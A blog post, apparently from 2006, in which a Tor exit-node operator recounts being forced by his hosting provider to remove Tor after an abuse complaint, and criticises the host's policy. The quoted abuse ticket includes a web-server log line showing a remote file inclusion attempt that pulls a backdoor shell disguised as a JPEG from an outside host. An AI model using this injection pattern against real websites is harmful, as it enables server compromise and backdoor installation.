Last Rites

Today has been a long time coming, but the inevitable happened in the end; Layered Technologies shut me down.

It started off with just the usual abuse complaint. This time it seems that someone used Tor to run code stored as a phony JPEG at freeimagehosting.net. The complainant had already fixed their vulnerability by the time they contacted Layered Technologies, but I still got the usual immense email telling me how to fix an exploit I didn’t have. I won’t post it all below as it’s ridiculous. This is the guts:

Ticket #AMU-37245-883

From: abuse@layeredtech.com
To: steve@bananasplit.info

Subject: Policy Enforcement of SID6321 LTSV-1594-SCROOK at 72.21.33.202 for Hacking

Thank you,

Logan
Layered Technologies
Abuse Department
Policy Enforcement Technician

ACCEPTABLE USE POLICY at http://layeredtech.com/aup.shtml

Date: Sun, 15 Oct 2006 18:32:53 -0500

A HACKER from LayeredTech is trying to exploit a hole in our client’s site code that we closed. The HACKING SCRIPTS are provided from FREEIMAGEHOSTING as phony JPGs.

72.21.33.202 – – [15/Oct/2006:03:09:07 -0700] “GET /index.php?pagename=http://img3.freeimagehosting.net/uploads/ba5cd3062d.jpg?
HTTP/1.1” 200 18434

HACKER:
Name: drooper.bananasplit.info
Address: 72.21.33.202

HACKING CODE:
Name: img3.freeimagehosting.net
Address: 70.86.147.247

Looks pretty minor to me and I’ve had enough prior dealings with Logan at Layered Technologies to know that he’s one of the good guys. Unfortunately by the time I responded, I didn’t get Logan, I got Terry. Oh dear, this is the guy who claims to know all about Tor but still seems to think I can gaze into a crystal ball and preempt an attack on an insecure website. Things went downhill from here, Terry insisted I shutdown my Tor service:

to: steve@bananasplit.info

You must remove the TOR (anonymous proxy) software because it has been used to send a URL embedded with a command to cause a 3rd party server to download a php exploit which is actually r57shell.php (a backdoor shell).

We do not allow TOR or Proxies on our network that are used for abuse.

This is the clincher that convinced me it was time to cancel my contract with Layered Technologies. Terry knows damn well that there’s nothing I can do to stop a Tor exit-node from being used in this manner. It seems Layered Technologies allow people to run Tor servers (sales pitch), but they do not allow Tor functionality. What a rip-off. I replied:

Terry,

I’ll comply and remove Tor, but please take this as notice that I won’t require your hosting beyond the end of this billing period. Having been specifically advised by LayeredTech that I could host a Tor service, this is very disappointing news. It seems your sales pitch in not in
tune with your operating practises.

I’d also like to point out that I’ve purchased a number of upgrades to my server. As LayeredTech are changing their policy with regard to Tor, am I entitled to any refund of these costs?

Regards
Steve

I guess the bit about wanting a refund is a little tongue-in-cheek. Layered Technologies will never admit that they errored in allowing a Tor service without really understanding what it was. To claim that the service is acceptable but what it does is not is nothing more than a “We’ve got your money, now fuck off, you’re a nuisance”. Terry’s response was:

We have not changed our policies. You are responsible for all abuse occuring on, from, or through your assigned IP addresses. You are required to remove the cause of any abuse which occurs on, from, or through your assigned IP addresses. We allow proxies and TOR only to the extent that it is not used for abuse. Because TOR is completely anonymous using tunnels to hide communications and preventing traffic analysis to determine the source of an abuse through your server, you cannot identify, remove, or prevent the cause of the abuse. Therefore, the only way to protect our IP space and innocent 3rd party networks from further abuse is to require removal of the TOR. You should understand that your server has been used to attempt to cause the installation of backdoor hacking software onto 3rd party servers which would completely comprimise the 3rd party server. This places our company at legal liability and this is justification for the removal of the software.

I wasted my time and replied to this, pointing out to Terry that Layered Technologies are not in any way legally accountable for a service that blindly routes traffic. He already knows this as I’ve bashed my head against a brick wall telling him all that before. I just got an automated response saying the abuse ticket was closed.

So there it is, the end of my Layered Technologies experience. Lots spent in setup and upgrade costs whilst all the time knowing that sooner or later they would pull the plug. At least recording my experiences will make others think twice when opening a service at Layered Technologies that can potentially be abused. In general, such services are probably going to be more trouble to them than the business is worth.

2 comments

Leave a comment